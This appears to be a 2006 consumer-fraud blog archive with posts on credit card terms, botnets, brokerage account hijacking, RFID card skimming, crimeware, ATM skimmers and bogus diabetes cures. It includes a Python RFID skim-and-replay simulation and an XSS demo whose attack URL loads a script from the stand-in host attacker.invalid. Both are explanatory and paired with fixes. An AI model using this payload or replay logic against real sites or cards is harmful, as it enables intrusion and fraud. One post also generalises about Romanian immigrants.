Saturday, October 28, 2006

A Hidden Cost of Identity Theft - "Credit Card Gotchas"

Just got my copy of the Consumers Union newsletter, and it ran an interesting article about "credit card gotchas."

Here is what they had to say:

The bank can change the interest rate and other terms at any time, for no reason, and you get stuck with a higher interest rate on purchases you already made. You mail the bill before it's due, but get hit with a late fee anyway. You sign up for a 7% interest rate, but it goes to 27% if you bounce a check, go over the limit, or miss payments.

Congressional elections are coming up. Let’s tell our members of Congress - and their challengers - that we want better treatment. Demand sensible reforms for credit cards!

These credit card "gotchas" aren't just happening to you. A recent Government Accountability Office report shows that one fifth of credit card holders pay an interest rate of 20% or more. Even if you have a lower rate, it can go up at any time, for no reason. The report also found that in just a year, more than one third of consumers were charged a late fee averaging $34! And, credit card companies are still raising interest rates based on whether the consumer missed a payment to a different creditor. Every year, bills to reform credit card practices are introduced but not passed. To learn more, click here.

Link to the Consumers Union article, here.

This made me wonder how often a victim of identity theft is hit with higher interest rates because negative data was wrongfully placed on their credit report after their identity was compromised.

The answer is probably pretty scary. It also raises the question of how much "extra revenue" financial institutions could be making as a result.

Then consider how much personal and financial information has been breached at financial institutions, where "everything was kept as quiet as possible" and we were told the victims were compensated.

As I've said before -- no business is in the business of losing money -- and the costs associated with fraud (in reality) are passed on to everyone.

Perhaps if more "sensible laws" on this matter were passed, financial institutions would have to protect people's personal and financial information a little better to maintain their profitability.

The latest tally of breached records containing personal information (courtesy of the Privacy Rights Clearinghouse) is 95,000,000, and some might argue that, given how "tight-lipped" breached organizations tend to be, the true figure is higher.

Here is a previous post I did on how fraud costs are misplaced:

Are We Addressing Cyber Crime from the Wrong End

Are the Phishermen Planning a Christmas Offensive?

Vnunet is reporting that security experts have noted a massive botnet (1,000,000 compromised PCs) being assembled, and the suspicion is that it will be used for a holiday season (Christmas) attack on Internet consumers.

"No one knows yet exactly what nefarious activity the army of captive PCs will be used for. But the chances are it will be a massive onslaught of phishing aimed at defrauding web consumers in the run up to Christmas."

Story, here.

Historically, criminals take advantage of the Christmas season due to the sheer volume of transactions - which makes it easier for them to disguise their activity.

According to Wikipedia, a botnet is "a jargon term for a collection of software robots, or bots, which run autonomously. This can also refer to the network of computers using distributed computing software."

In less technical terms, Internet criminals take over people's systems and then use them to launch spam and scams without the owner's knowledge.

According to the report, no one is certain who is behind the botnet being assembled, or exactly what the intention is. Weak or missing security on the victim's machine is normally the reason a computer can be compromised in the first place.

If the intention is phishing - the Anti-Phishing Working Group has a great page on their site on how the average person can avoid these scams, here.

Thursday, October 26, 2006

Online Brokerage Scams are a Sign of a Bigger Problem

A couple of weeks ago, I did a post on "Cyber Crooks Targeting Online Brokerages." Now more information is being released about this latest target of financial crime.

Courtesy of Linda Epstein at Blogging Stocks:

"E*Trade reported on a conference call last week that it spent $18 million in the third quarter to compensate customers affected by trading fraud, according to a report from Bloomberg. TD Ameritrade also admitted to losses, but gave no numbers. We may get more details when it reports its numbers, expected later today. Charles Schwab told Bloomberg that it didn't see "anything unusual enough to warrant a financial disclosure." Well, if I were a Schwab customer and my account were infiltrated, I certainly would consider it important enough for disclosure. I hope Schwab is being more candid with its customers. Fidelity did not comment on Bloomberg's story."

Blogging Stocks article, here.

InformationWeek did another article with good information about this, here.

According to the articles, hijacked brokerage accounts are being used in "pump and dump" schemes after the account holders' personal computers are compromised with crimeware.

Wikipedia describes a "pump and dump" scheme as "a term used to describe a form of financial fraud that typically involves artificially inflating the price of a stock or other security through promotion, in order to sell at the inflated price (creating artificial demand)."

The InformationWeek article also mentions that money is being stolen directly from accounts.

It seems that some of the brokers are disclosing their problems and some aren't. Thus far, victims are being compensated; however, in reality, fraud costs are normally passed on to the consumer.

Corporations aren't in business to lose money.

The InformationWeek article mentions law enforcement's frustration that a lot of these incidents aren't reported, or are being "underreported."

They also mention that only a "handful" of States have laws on the books to address "phishing" and that our legislators can't agree on a Federal law.

Until we enact the necessary legislation and give law enforcement "full cooperation," the criminals behind this will be "laughing all the way to the bank."

Wednesday, October 25, 2006

Are RFID Credit Cards Safe?

The RFID Consortium for Security and Privacy (RFID-CUSP) has issued a study about vulnerabilities in first-generation RFID-enabled credit cards.

In their blog, Ari Juels writes:

Consumers in the United States today carry some twenty million or so credit cards and debit cards equipped with RFID (Radio-Frequency IDentification) chips. RFID chips communicate transaction data over short distances via radio. They eliminate the need to swipe cards or hand them to merchants. Consumers can instead make payments simply by waving their cards—or even just their wallets—near point-of-sale terminals.

While appealing to both consumers and merchants, the convenience of RFID credit cards has a flip side. What a legitimate merchant terminal can read, a malicious scanning device can also read without a consumer’s consent or knowledge. RFID credit cards therefore call for particularly careful security design.

Blog post, here.

In a "nutshell," the study warns that current RFID credit cards can have the cardholder's identifying data read without contact and without the cardholder's knowledge, and that the information read could also be used for credit/debit card skimming.

They also state that this can be accomplished without great technical difficulty and that "slightly stronger data protections and cryptography would largely prevent the problems they discovered."
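To make the "slightly stronger cryptography" point concrete, here is an added example of my own (not code from the RFID-CUSP study): a card that answers every reader with the same cleartext record can be skimmed once and replayed later, while a card that hides the name and binds its answer to a fresh challenge from the terminal cannot. The card number, cardholder name, per-card key and message formats are constructed for illustration and do not match any real contactless card protocol.

```python
"""Static card record vs. challenge/response: why a first-generation
contactless card can be skimmed and replayed, and what a fix looks like.

Added example, not code from the RFID-CUSP study. The card number (a
well-known test number), the cardholder name, the per-card key and the
wire formats are all constructed for illustration.
"""
import hashlib
import hmac
import secrets

CARD_NUMBER = "4111111111111111"             # constructed test PAN, not a real account
CARDHOLDER = "JOHN Q PUBLIC"                 # constructed
EXPIRY = "0908"                              # MMYY, constructed
CARD_KEY = b"per-card secret shared with the issuer only (demo)"  # never sent over the air


def luhn_ok(pan: str) -> bool:
    """Luhn check-digit test: the only validation a terminal can do on a static record."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


class FirstGenCard:
    """Answers any reader with the same cleartext record, whatever it is asked."""
    def respond(self, challenge: bytes) -> bytes:
        return f"{CARD_NUMBER}^{CARDHOLDER}^{EXPIRY}".encode()


class ChallengeResponseCard:
    """Keeps the name off the air and MACs the reader's nonce with a key the
    skimmer never sees, so a captured answer is only valid for that one nonce."""
    def respond(self, challenge: bytes) -> bytes:
        mac = hmac.new(CARD_KEY, challenge + CARD_NUMBER.encode(), hashlib.sha256).hexdigest()
        return f"{CARD_NUMBER}^{mac}".encode()


def first_gen_terminal_accepts(challenge: bytes, response: bytes) -> bool:
    """Static record: nothing ties the bytes to this session, so a replay passes."""
    pan, _name, _exp = response.decode().split("^")
    return luhn_ok(pan)


def challenge_response_terminal_accepts(challenge: bytes, response: bytes) -> bool:
    """Issuer-side check: recompute the MAC over the nonce this terminal issued."""
    pan, mac = response.decode().split("^")
    expected = hmac.new(CARD_KEY, challenge + pan.encode(), hashlib.sha256).hexdigest()
    return luhn_ok(pan) and hmac.compare_digest(mac, expected)


def legit_purchase_accepted(card, terminal_accepts) -> bool:
    """Normal tap: the terminal issues a nonce and the card answers it directly."""
    nonce = secrets.token_bytes(8)
    return terminal_accepts(nonce, card.respond(nonce))


def skim_then_replay_accepted(card, terminal_accepts) -> bool:
    """A covert reader captures one answer (say, through the victim's wallet);
    later the crook presents that capture to a real terminal with its own nonce."""
    captured = card.respond(secrets.token_bytes(8))   # skimmer's session
    terminal_nonce = secrets.token_bytes(8)           # a different, later session
    return terminal_accepts(terminal_nonce, captured)


def name_leaks_over_the_air(card) -> bool:
    """Does a single read expose the cardholder's name in the clear?"""
    return CARDHOLDER.encode() in card.respond(secrets.token_bytes(8))


if __name__ == "__main__":
    for card, term in ((FirstGenCard(), first_gen_terminal_accepts),
                       (ChallengeResponseCard(), challenge_response_terminal_accepts)):
        print(type(card).__name__,
              "legit:", legit_purchase_accepted(card, term),
              "replay:", skim_then_replay_accepted(card, term),
              "name leaks:", name_leaks_over_the_air(card))
```

The first card passes the replay, because the terminal has nothing to check except the Luhn digit; the second rejects it, because the MAC was computed over the skimmer's nonce, not the terminal's. Even the hardened version still sends the card number in the clear, which is the skimming concern the study raises; a production design would also avoid putting the static account number on the air at all.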

The study acknowledges that "card skimming" is already a big problem, so these cards are unlikely to change anything that isn't already going on.

My question is when will we start developing technology that will protect the consumer instead of developing technology that will "probably" add to the problem?

There is an interesting demonstration posted by RFID-CUSP on YouTube about this, here.

Here is a previous post I did on RFID:

RFID, A Necessary Evil; or an Invasion of Privacy?

Tuesday, October 24, 2006

The State of Crimeware on the Internet

"Crimeware," according to Wikipedia, is a term coined by Peter Cassidy of the Anti-Phishing Working Group for a "type of computer program or suite of computer programs that are designed specifically to automate financial crime."

Last week, the US Department of Homeland Security, SRI International Identity Theft Technology Council and the Anti-Phishing Working Group issued a pretty telling report about how crimeware is being used to commit financial crimes and identity theft.

From the executive summary, here is how the report defines crimeware and how Internet criminals distribute it:

Crimeware is software that performs illegal actions unanticipated by a user running the software, which are intended to yield financial benefits to the distributor of the software.

Crimeware is a ubiquitous fact of life in modern online interactions. It is distributed via many mechanisms, including:

  • Social engineering attacks convincing users to open a malicious email attachment containing crimeware;
  • Injection of crimeware into legitimate web sites via content injection attacks such as cross-site scripting;
  • Exploiting security vulnerabilities through worms and other attacks on security flaws in operating systems, browsers, and other commonly installed software; and
  • Insertion of crimeware into downloadable software that otherwise performs a desirable function.

Full report, here.
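The second distribution mechanism in that list, content injection through cross-site scripting, is worth seeing in code. Here is an added example of my own (not from the DHS/SRI/APWG report): a search page on a trusted site reflects a query parameter into its HTML without escaping, so a crafted link makes the legitimate site serve a script tag that pulls a payload from a host the attacker controls. The template, the parameter name "q", the host names and the payload file name are all constructed for illustration.

```python
"""Reflected cross-site scripting as a crimeware delivery channel, and the fix.

Added example, not code from the DHS/SRI/APWG report. The page template,
the "q" parameter, bank.example, attacker.invalid and crimeware.js are
constructed for illustration.
"""
from html import escape
from urllib.parse import parse_qs, urlsplit

# Constructed search-results page on the trusted site.
TEMPLATE = "<html><body><h1>Results for: {term}</h1></body></html>"


def _query_term(url: str) -> str:
    """Pull the (percent-decoded) q= parameter out of a request URL."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_vulnerable(url: str) -> str:
    """Interpolates the user's term straight into the markup.  Anything the
    victim was tricked into clicking is now served from the trusted origin."""
    return TEMPLATE.format(term=_query_term(url))


def render_hardened(url: str) -> str:
    """Same page, but the term is HTML-escaped before it touches the markup,
    so '<', '>', '&' and quotes can no longer open a tag or an attribute."""
    return TEMPLATE.format(term=escape(_query_term(url), quote=True))


def contains_injected_script(html_doc: str) -> bool:
    """Crude check used by the demo: did a <script> tag make it into the page?"""
    return "<script" in html_doc.lower()


# Constructed attack link: q=<script src="http://attacker.invalid/crimeware.js"></script>
ATTACK_URL = (
    "https://bank.example/search?q="
    "%3Cscript%20src%3D%22http%3A%2F%2Fattacker.invalid%2Fcrimeware.js%22%3E%3C%2Fscript%3E"
)

if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(ATTACK_URL))
    print("hardened:  ", render_hardened(ATTACK_URL))
```

With the vulnerable renderer, the victim's browser receives a page from bank.example containing `<script src="http://attacker.invalid/crimeware.js">`, fetches that script with the bank's page as its context, and runs it; the "legitimate web site" in the report's wording is doing the delivery. The hardened renderer still shows the attacker's text to the user, but as inert, escaped characters. Output encoding at the point of insertion is the check to look for when reviewing any page that reflects request data.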

Recently, we've read about organized crime groups employing "highly technical personnel" and running carder forums, where stolen financial information is bought and sold.

A recent USA Today story about "carder forums" quoted the following statistics:

$67.2 billion: FBI estimate of what U.S. businesses lose annually because of computer-related crimes.

$8 billion: Consumer Reports estimate of what U.S. consumers lost the past two years because of viruses, spyware and Internet scams.

93.8 million: Privacy Rights Clearinghouse's count of personal records reported lost or stolen since February 2005.

26,150: The Anti-Phishing Working Group's count of unique variations of phishing scams reported in August 2006.

Crimeware and the Internet are fueling the identity theft problem, which in turn could threaten the stability of our financial systems. Some even say it might be a national security issue.

In the rapidly changing world of technology, laws have failed to keep pace. Perhaps with the upcoming elections, it's time for all of us to examine what our political representatives are doing about this problem.

We might find that we all have a common interest on this issue!

Monday, October 23, 2006

Romanian Illegal Immigrants Install ATM (Fraud) Machines

(Older picture of a skimming device)

Illegal immigration isn't a "victimless crime," and the work they are performing doesn't always help the economy. Apparently Romanian illegal immigrants are installing fake ATM fronts - used to steal debit-card details - for the very same criminal organizations that helped them get into the United Kingdom illegally.

Justin Penrose of the Sunday Mirror (UK) is reporting:

They have developed a high-tech ATM front which looks exactly like the original - and it steals a victim's details in seconds.

The new cashpoint fascia is so convincing that gangs are selling it to other crooks for £10,000 a time.

The covers even have a sticker which warns customers to watch out for fraudsters. When a victim uses an ATM it records details while a camera videos the PIN. Within seconds these details are sent to a laptop and a cloned card is made. Several wealthy Romanian "godfathers" run crooked empires from their mansions in the Balkans.

Sunday Mirror story, here.

The article also states that these new and very convincing ATM fronts are being produced and sold to other criminal organizations.

I wonder how long it will be before this new "skimming device" is exported from the United Kingdom? In the past couple of years, debit-card fraud has become a worldwide problem.

This reminds me that the best defense against ATM skimming is to always cover the keypad when entering your PIN! The fake front still captures the card data, but without the PIN captured on camera, a cloned card is far less useful at a cash machine.

Here is a previous post about the growing problem of debit-card fraud:

Debit Card Breaches, A Growing Problem

And here is an older post I did (with pictures) of a skimming device:

ATM Machines That Clone Your Card

If anyone has a picture of one of these new devices, please send it to

Sunday, October 22, 2006

FTC Addresses Fake Diabetes Cures

We all get spam hawking miracle weight loss products and the "like," but here is something a little more serious.

Now fraudulent websites are offering bogus products claiming to cure diabetes.

From the FTC press release:

The Federal Trade Commission (FTC) and the Food and Drug Administration (FDA), working with government agencies in Mexico and Canada, have launched a drive to stop deceptive Internet advertisements and sales of products misrepresented as cures or treatments for diabetes. The ongoing joint campaign has so far included approximately 180 warning letters and other advisories sent to online outlets in the three countries.

“We will continue working with our partners in the U.S. and internationally to make sure scammers have no place to hide,” said Lydia Parnes, Director of the FTC’s Bureau of Consumer Protection. “The Internet can be a great source of information, but it also is a billboard for ads that promise miracle cures for diabetes and other serious diseases. Our advice to consumers: ‘Be smart, be skeptical’ when evaluating health claims online."

FTC press release, here.

Diabetes is a serious ailment that can lead to life threatening complications if not treated properly.

Wikipedia has information on the disease, here.